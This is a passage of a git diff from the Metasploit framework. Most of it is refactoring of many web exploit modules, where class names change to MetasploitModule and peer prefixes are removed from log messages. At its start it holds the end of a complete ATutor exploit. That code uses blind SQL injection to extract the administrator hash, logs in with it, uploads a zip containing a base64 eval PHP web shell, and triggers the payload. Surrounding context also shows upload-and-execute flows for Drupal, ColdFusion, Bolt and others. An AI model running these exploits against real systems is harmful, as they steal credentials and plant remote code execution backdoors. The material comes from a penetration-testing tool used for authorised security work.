print_error(msg='') + super("#{peer} - #{msg}") + end + + def print_good(msg='') + super("#{peer} - #{msg}") + end + + def check + # the only way to test if the target is vuln + if test_injection + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + end + + def create_zip_file + zip_file = Rex::Zip::Archive.new + @header = Rex::Text.rand_text_alpha_upper(4) + @payload_name = Rex::Text.rand_text_alpha_lower(4) + @plugin_name = Rex::Text.rand_text_alpha_lower(3) + + path = "#{@plugin_name}/#{@payload_name}.php" + # this content path is where the ATutor authors recommended installing it + register_file_for_cleanup("#{@payload_name}.php", "/var/content/module/#{path}") + zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>") + zip_file.pack + end + + def exec_code + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"), + 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" + }, 0.1) + end + + def upload_shell(cookie) + post_data = Rex::MIME::Message.new + post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name=\"modulefile\"; filename=\"#{@plugin_name}.zip\"") + post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"install_upload\"") + data = post_data.to_s + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"), + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'cookie' => cookie + }) + + if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection), + 'cookie' => cookie + }) + if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"), + 'cookie' => cookie + }) + return true + end + end + # unknown failure... + fail_with(Failure::Unknown, "Unable to upload php code") + return false + end + + def login(username, hash) + password = Rex::Text.sha1(hash) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "login.php"), + 'vars_post' => { + 'form_password_hidden' => password, + 'form_login' => username, + 'submit' => 'Login', + 'token' => '' + }, + }) + # poor developer practices + cookie = "ATutorID=#{$4};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/ + if res && res.code == 302 && res.redirection.to_s.include?('admin/index.php') + # if we made it here, we are admin + report_cred(user: username, password: hash) + return cookie + end + # auth failed if we land here, bail + fail_with(Failure::NoAccess, "Authentication failed with username #{username}") + return nil + end + + def perform_request(sqli) + # the search requires a minimum of 3 chars + sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='" + rand_key = Rex::Text.rand_text_alpha(1) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "mods", "_standard", "social", "index_public.php"), + 'vars_post' => { + "search_friends_#{rand_key}" => sqli, + 'rand_key' => rand_key, + 'search' => 'Search' + }, + }) + return res.body + end + + def dump_the_hash + extracted_hash = "" + sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)" + login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli).to_i + for i in 1..login_and_hash_length + sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))" + asciival = generate_sql_and_test(false, false, sqli) + if asciival >= 0 + extracted_hash << asciival.chr + end + end + return extracted_hash.split(":") + end + + # greetz to rsauron & the darkc0de crew! + def get_ascii_value(sql) + lower = 0 + upper = 126 + while lower < upper + mid = (lower + upper) / 2 + sqli = "#{sql}>#{mid}" + result = perform_request(sqli) + if result =~ /There are \d+ entries\./ + lower = mid + 1 + else + upper = mid + end + end + if lower > 0 and lower < 126 + value = lower + else + sqli = "#{sql}=#{lower}" + result = perform_request(sqli) + if result =~ /There are \d+ entries\./ + value = lower + end + end + return value + end + + def generate_sql_and_test(do_true=false, do_test=false, sql=nil) + if do_test + if do_true + result = perform_request("1=1") + if result =~ /There are \d+ entries\./ + return true + end + else not do_true + result = perform_request("1=2") + if not result =~ /There are \d+ entries\./ + return true + end + end + elsif not do_test and sql + return get_ascii_value(sql) + end + end + + def test_injection + if generate_sql_and_test(do_true=true, do_test=true, sql=nil) + if generate_sql_and_test(do_true=false, do_test=true, sql=nil) + return true + end + end + return false + end + + def report_cred(opts) + service_data = { + address: rhost, + port: rport, + service_name: ssl ? 'https' : 'http', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: fullname, + post_reference_name: self.refname, + private_data: opts[:password], + origin_type: :service, + private_type: :password, + private_type: :nonreplayable_hash, + jtr_format: 'sha512', + username: opts[:user] + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::SUCCESSFUL, + last_attempted_at: Time.now + }.merge(service_data) + + create_credential_login(login_data) + end + + def exploit + print_status("Dumping the username and password hash...") + credz = dump_the_hash + if credz + print_good("Got the #{credz[0]}'s hash: #{credz[1]} !") + admin_cookie = login(credz[0], credz[1]) + if upload_shell(admin_cookie) + exec_code + end + end + end +end diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb index b7017589ee..392ffc6c62 100644 --- a/modules/exploits/multi/http/auxilium_upload_exec.rb +++ b/modules/exploits/multi/http/auxilium_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = data.to_s - print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") + print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"), @@ -86,14 +86,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from host") + print_error("No response from host") return end - print_status("#{peer} - Requesting '#{php_fname}'...") + print_status("Requesting '#{php_fname}'...") res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")}) if res and res.code == 404 - print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}") + print_error("Upload unsuccessful: #{res.code.to_s}") return end diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index ca192f495c..762484a328 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] } diff --git a/modules/exploits/multi/http/bolt_file_upload.rb b/modules/exploits/multi/http/bolt_file_upload.rb index ec8b0b4797..810c5a1234 100644 --- a/modules/exploits/multi/http/bolt_file_upload.rb +++ b/modules/exploits/multi/http/bolt_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response received from the target.') unless res session_cookie = res.get_cookies - vprint_status("#{peer} - Logging in...") + vprint_status("Logging in...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'bolt', 'login'), @@ -130,17 +130,17 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - vprint_status("#{peer} - Authenticating using #{username}:#{password}") + vprint_status("Authenticating using #{username}:#{password}") cookie = bolt_login(username, password) fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil? - vprint_good("#{peer} - Authenticated with Bolt.") + vprint_good("Authenticated with Bolt.") token = get_token(cookie, fname) fail_with(Failure::Unknown, 'No token found.') if token.nil? - vprint_good("#{peer} - Token \"#{token}\" found.") + vprint_good("Token \"#{token}\" found.") - vprint_status("#{peer} - Preparing payload...") + vprint_status("Preparing payload...") payload_name = Rex::Text.rand_text_alpha_lower(10) data = Rex::MIME::Message.new @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"') post_data = data.to_s - vprint_status("#{peer} - Uploading payload...") + vprint_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname), @@ -158,17 +158,17 @@ class Metasploit3 < Msf::Exploit::Remote ) fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302 - vprint_good("#{peer} - Uploaded the payload.") + vprint_good("Uploaded the payload.") rename = rename_payload(cookie, payload_name, fname) fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil? php_file_name = "#{payload_name}.php" payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name) - vprint_status("#{peer} - Parsed response.") + vprint_status("Parsed response.") register_files_for_cleanup(php_file_name) - vprint_status("#{peer} - Executing the payload at #{payload_url}.") + vprint_status("Executing the payload at #{payload_url}.") send_request_cgi( 'uri' => payload_url, 'method' => 'GET' diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb index 03028e468b..41592806fa 100644 --- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb +++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -66,7 +66,7 @@ class Metasploit4 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending exploit...") + print_status("Sending exploit...") http_send_command(payload.raw) end end diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb index a0c6b0f4c6..78267b571c 100644 --- a/modules/exploits/multi/http/cisco_dcnm_upload.rb +++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote war_filename = "#{app_base}.war" war_location = target['AutoDeployPath'] - print_status("#{peer} - Uploading WAR file #{war_filename}...") + print_status("Uploading WAR file #{war_filename}...") res = upload_file(war_location, war_filename, war) if res @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), diff --git a/modules/exploits/multi/http/coldfusion_rds.rb b/modules/exploits/multi/http/coldfusion_rds.rb index bdeb327d67..d080bbed55 100644 --- a/modules/exploits/multi/http/coldfusion_rds.rb +++ b/modules/exploits/multi/http/coldfusion_rds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/ - vprint_good "#{peer} - Administrator access available" + vprint_good "Administrator access available" else return Exploit::CheckCode::Safe end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote imghash = "596b3fc4f1a0b818979db1cf94a82220" if img == imghash - vprint_good "#{peer} - ColdFusion 9 Detected" + vprint_good "ColdFusion 9 Detected" else return Exploit::CheckCode::Safe end @@ -192,8 +192,8 @@ class Metasploit3 < Msf::Exploit::Remote def exec_payload uri = target_uri.path - print_status("#{peer} - Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}") - print_status("#{peer} - Executing payload...") + print_status("Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}") + print_status("Executing payload...") res = send_request_cgi({ 'method' => 'GET', @@ -207,7 +207,7 @@ class Metasploit3 < Msf::Exploit::Remote @filename = rand_text_alpha(8+rand(8)) + ".cfm" #numbers is a bad idea taskname = rand_text_alpha(8+rand(8)) #numbers is a bad idea - print_status "#{peer} - Trying to upload payload via scheduled task..." + print_status "Trying to upload payload via scheduled task..." res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'), @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/ - print_good("#{peer} - Logged in as Administrator!") + print_good("Logged in as Administrator!") else fail_with(Failure::Unknown, "#{peer} - Login Failed") end @@ -259,12 +259,12 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /<input type="text" maxlength="550" name="directoryPath" value="(.*)" size="40" id="dirpath">/ file_path = $1 - print_good("#{peer} - File path disclosed! #{file_path}") + print_good("File path disclosed! #{file_path}") else fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath") end - print_status("#{peer} - Adding scheduled task") + print_status("Adding scheduled task") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduleedit.cfm'), @@ -287,7 +287,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Scheduled task failed") end - print_status("#{peer} - Running scheduled task") + print_status("Running scheduled task") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'), @@ -299,12 +299,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /This scheduled task was completed successfully/ - print_good("#{peer} - Scheduled task completed successfully") + print_good("Scheduled task completed successfully") else fail_with(Failure::Unknown, "#{peer} - Scheduled task failed") end - print_status("#{peer} - Deleting scheduled task") + print_status("Deleting scheduled task") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'), @@ -316,7 +316,7 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res and res.code == 200 - print_error("#{peer} - Scheduled task deletion failed, cleanup might be needed!") + print_error("Scheduled task deletion failed, cleanup might be needed!") end end end diff --git a/modules/exploits/multi/http/cups_bash_env_exec.rb b/modules/exploits/multi/http/cups_bash_env_exec.rb index 399846da49..c8d35b9342 100644 --- a/modules/exploits/multi/http/cups_bash_env_exec.rb +++ b/modules/exploits/multi/http/cups_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -88,21 +88,21 @@ class Metasploit4 < Msf::Exploit::Remote printer_name = rand_text_alphanumeric(10 + rand(5)) res = add_printer(printer_name, '') if !res - vprint_error("#{peer} - No response from host") + vprint_error("No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /CUPS\/([\d\.]+)/ - vprint_status("#{peer} - Found CUPS version #{$1}") + vprint_status("Found CUPS version #{$1}") else - print_status("#{peer} - Target is not a CUPS web server") + print_status("Target is not a CUPS web server") return Exploit::CheckCode::Safe end if res.body =~ /Set Default Options for #{printer_name}/ - vprint_good("#{peer} - Added printer successfully") + vprint_good("Added printer successfully") delete_printer(printer_name) - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) - vprint_error("#{peer} - Authentication failed") + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) + vprint_error("Authentication failed") elsif res.code == 426 - vprint_error("#{peer} - SSL required - set SSL true") + vprint_error("SSL required - set SSL true") end Exploit::CheckCode::Detected end @@ -128,8 +128,8 @@ class Metasploit4 < Msf::Exploit::Remote if !res fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.") elsif res.body =~ /Set Default Options for #{printer_name}/ - print_good("#{peer} - Added printer successfully") - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + print_good("Added printer successfully") + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.") @@ -144,8 +144,8 @@ class Metasploit4 < Msf::Exploit::Remote if !res fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.") elsif res.body =~ /Test page sent; job ID is/ - vprint_good("#{peer} - Added test page to printer queue") - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + vprint_good("Added test page to printer queue") + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.") @@ -158,13 +158,13 @@ class Metasploit4 < Msf::Exploit::Remote if !res fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.") elsif res.body =~ /has been deleted successfully/ - print_status("#{peer} - Deleted printer '#{printer_name}' successfully") - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) - vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.") + print_status("Deleted printer '#{printer_name}' successfully") + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) + vprint_warning("Could not delete printer '#{printer_name}' - Authentication failed.") elsif res.code == 426 - vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.") + vprint_warning("Could not delete printer '#{printer_name}' - SSL required - set SSL true.") else - vprint_warning("#{peer} - Could not delete printer '#{printer_name}'") + vprint_warning("Could not delete printer '#{printer_name}'") end end @@ -172,7 +172,7 @@ class Metasploit4 < Msf::Exploit::Remote # Add a printer to CUPS # def add_printer(printer_name, cmd) - vprint_status("#{peer} - Adding new printer '#{printer_name}'") + vprint_status("Adding new printer '#{printer_name}'") ppd_name = "#{rand_text_alphanumeric(10 + rand(5))}.ppd" ppd_file = <<-EOF @@ -241,7 +241,7 @@ EOF # Queue a printer test page # def print_test_page(printer_name) - vprint_status("#{peer} - Adding test page to printer queue") + vprint_status("Adding test page to printer queue") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'printers', printer_name), @@ -258,7 +258,7 @@ EOF # Delete a printer # def delete_printer(printer_name) - vprint_status("#{peer} - Deleting printer '#{printer_name}'") + vprint_status("Deleting printer '#{printer_name}'") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin'), diff --git a/modules/exploits/multi/http/cuteflow_upload_exec.rb b/modules/exploits/multi/http/cuteflow_upload_exec.rb index 63fc450568..1775c6d41c 100644 --- a/modules/exploits/multi/http/cuteflow_upload_exec.rb +++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -101,17 +101,17 @@ class Metasploit3 < Msf::Exploit::Remote base << '/' if base[-1, 1] != '/' # upload PHP payload to upload/___1/ - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alphanumeric(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| res = upload(base, fname, php) if res.nil? - print_error("#{peer} - Uploading PHP payload failed") + print_error("Uploading PHP payload failed") return end # retrieve and execute PHP payload - print_status("#{peer} - Retrieving file: #{fname}") + print_status("Retrieving file: #{fname}") send_request_raw({ 'method' => 'GET', 'uri' => normalize_uri(base, "upload/___1/#{fname}") diff --git a/modules/exploits/multi/http/dexter_casinoloader_exec.rb b/modules/exploits/multi/http/dexter_casinoloader_exec.rb index 71c1b0a0c1..fd8d55a9c8 100644 --- a/modules/exploits/multi/http/dexter_casinoloader_exec.rb +++ b/modules/exploits/multi/http/dexter_casinoloader_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -107,19 +107,19 @@ class Metasploit3 < Msf::Exploit::Remote def exploit payload_name = rand_text_alpha(rand(10) + 5) + '.php' - print_status("#{peer} - Using SQL injection to acquire credentials") + print_status("Using SQL injection to acquire credentials") user = database_get_field('users', 'name', 0) if user == false - print_error("#{peer} - Failed to acquire administrator username") + print_error("Failed to acquire administrator username") return end password = database_get_field('users', 'password', 0) if password == false - print_error("#{peer} - Failed to acquire administrator password") + print_error("Failed to acquire administrator password") end - print_status("#{peer} - Using #{user}:#{password}") + print_status("Using #{user}:#{password}") res = send_request_cgi({ 'method' => 'POST', @@ -135,9 +135,9 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.headers.has_key?('Location') login_cookie = res.get_cookies - print_status("#{peer} - Login successful") + print_status("Login successful") else - print_error("#{peer} - Failed to log in") + print_error("Failed to log in") return end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part("<?php #{payload.encoded} ?>", nil, nil, "form-data; name=\"uploadedfile\"; filename=\"#{payload_name}\"") post_data = data.to_s - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => upload, @@ -159,11 +159,11 @@ class Metasploit3 < Msf::Exploit::Remote path = $1 path = path.sub! "\\", "/" target_path = normalize_uri(target_uri.path, path) - print_status("#{peer} - Requesting: #{target_path}") + print_status("Requesting: #{target_path}") send_request_raw({'uri' => normalize_uri(target_path)}) handler else - print_error("#{peer} - Failed to upload file") + print_error("Failed to upload file") return end end diff --git a/modules/exploits/multi/http/drupal_drupageddon.rb b/modules/exploits/multi/http/drupal_drupageddon.rb index d7fe87b82c..38f32cb614 100644 --- a/modules/exploits/multi/http/drupal_drupageddon.rb +++ b/modules/exploits/multi/http/drupal_drupageddon.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote md5_base64 = phpass_encode64(md5, md5.length) md5_stripped = md5_base64[0...22] pass = "$P\\$" + iter_char + salt + md5_stripped - vprint_status("#{peer} - password hash: #{pass}") + vprint_status("password hash: #{pass}") return pass end @@ -129,8 +129,8 @@ class Metasploit3 < Msf::Exploit::Remote form_build_id = $1 if content =~ /name="form_build_id" value="(.+?)"/ form_token = $1 if content =~ /name="form_token" value="(.+?)"/ - vprint_status("#{peer} - form_build_id: #{form_build_id}") - vprint_status("#{peer} - form_token: #{form_token}") + vprint_status("form_build_id: #{form_build_id}") + vprint_status("form_token: #{form_token}") return form_build_id, form_token end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote # TODO: Check if option admin_role exists via admin/people/permissions/roles # call login page to extract tokens - print_status("#{peer} - Testing page") + print_status("Testing page") res = send_request_cgi({ 'uri' => uri_path, 'vars_get' => { @@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote 'op' => 'Log in' } - print_status("#{peer} - Creating new user #{user}:#{pass}") + print_status("Creating new user #{user}:#{pass}") res = send_request_cgi({ 'uri' => uri_path, 'method' => 'POST', @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote end # login - print_status("#{peer} - Logging in as #{user}:#{pass}") + print_status("Logging in as #{user}:#{pass}") res = send_request_cgi({ 'uri' => uri_path, 'method' => 'POST', @@ -202,10 +202,10 @@ class Metasploit3 < Msf::Exploit::Remote end cookie = res.get_cookies - vprint_status("#{peer} - cookie: #{cookie}") + vprint_status("cookie: #{cookie}") # call admin interface to extract CSRF token and enabled modules - print_status("#{peer} - Trying to parse enabled modules") + print_status("Trying to parse enabled modules") res = send_request_cgi({ 'uri' => uri_path, 'vars_get' => { @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote end # enable PHP filter - print_status("#{peer} - Enabling the PHP filter module") + print_status("Enabling the PHP filter module") res = send_request_cgi({ 'uri' => uri_path, 'method' => 'POST', @@ -253,7 +253,7 @@ class Metasploit3 < Msf::Exploit::Remote # Response: http 302, Location: http://10.211.55.50/?q=admin/modules - print_status("#{peer} - Setting permissions for PHP filter module") + print_status("Setting permissions for PHP filter module") # allow admin to use php_code res = send_request_cgi({ @@ -280,7 +280,7 @@ class Metasploit3 < Msf::Exploit::Remote # get administrator role id id = $1 if res.body =~ /for="edit-([0-9]+)-administer-content-types">#{admin_role}:/ - vprint_status("#{peer} - admin role id: #{id}") + vprint_status("admin role id: #{id}") unless id fail_with(Failure::Unknown, "Could not parse out administrator ID") @@ -313,7 +313,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Add new Content page (extract csrf token) - print_status("#{peer} - Getting tokens from create new article page") + print_status("Getting tokens from create new article page") res = send_request_cgi({ 'uri' => uri_path, 'vars_get' => { @@ -342,7 +342,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('1', nil, nil, 'form-data; name="promote"') post_data = data.to_s - print_status("#{peer} - Calling preview page. Exploit should trigger...") + print_status("Calling preview page. Exploit should trigger...") send_request_cgi( 'method' => 'POST', 'uri' => uri_path, diff --git a/modules/exploits/multi/http/eaton_nsm_code_exec.rb b/modules/exploits/multi/http/eaton_nsm_code_exec.rb index b25107fc24..aa9ea2ce7f 100644 --- a/modules/exploits/multi/http/eaton_nsm_code_exec.rb +++ b/modules/exploits/multi/http/eaton_nsm_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/eventlog_file_upload.rb b/modules/exploits/multi/http/eventlog_file_upload.rb index 0f1d3770c3..442cb13d75 100644 --- a/modules/exploits/multi/http/eventlog_file_upload.rb +++ b/modules/exploits/multi/http/eventlog_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s if is_payload - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") end res = send_request_cgi({ 'uri' => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")), @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body.empty? if is_payload - print_status("#{peer} - Payload uploaded successfully") + print_status("Payload uploaded successfully") end register_files_for_cleanup(target_path.gsub("../../", "../")) return true @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote def pick_target return target if target.name != 'Automatic' - print_status("#{peer} - Determining target") + print_status("Determining target") version = get_version @@ -308,7 +308,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end - print_status("#{peer} - Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...") + print_status("Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...") sleep(datastore['SLEEP']) return normalize_uri(ear_app_base, war_app_base, rand_text_alphanumeric(4 + rand(32 - 4))) end @@ -322,10 +322,10 @@ class Metasploit3 < Msf::Exploit::Remote @my_target = pick_target if @my_target.nil? - print_error("#{peer} - Unable to select a target, we must bail.") + print_error("Unable to select a target, we must bail.") return else - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") end if @my_target == targets[1] @@ -334,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote exploit_path = exploit_native end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(exploit_path), 'method' => 'GET' diff --git a/modules/exploits/multi/http/extplorer_upload_exec.rb b/modules/exploits/multi/http/extplorer_upload_exec.rb index 1289010cbd..a9208b1b86 100644 --- a/modules/exploits/multi/http/extplorer_upload_exec.rb +++ b/modules/exploits/multi/http/extplorer_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return 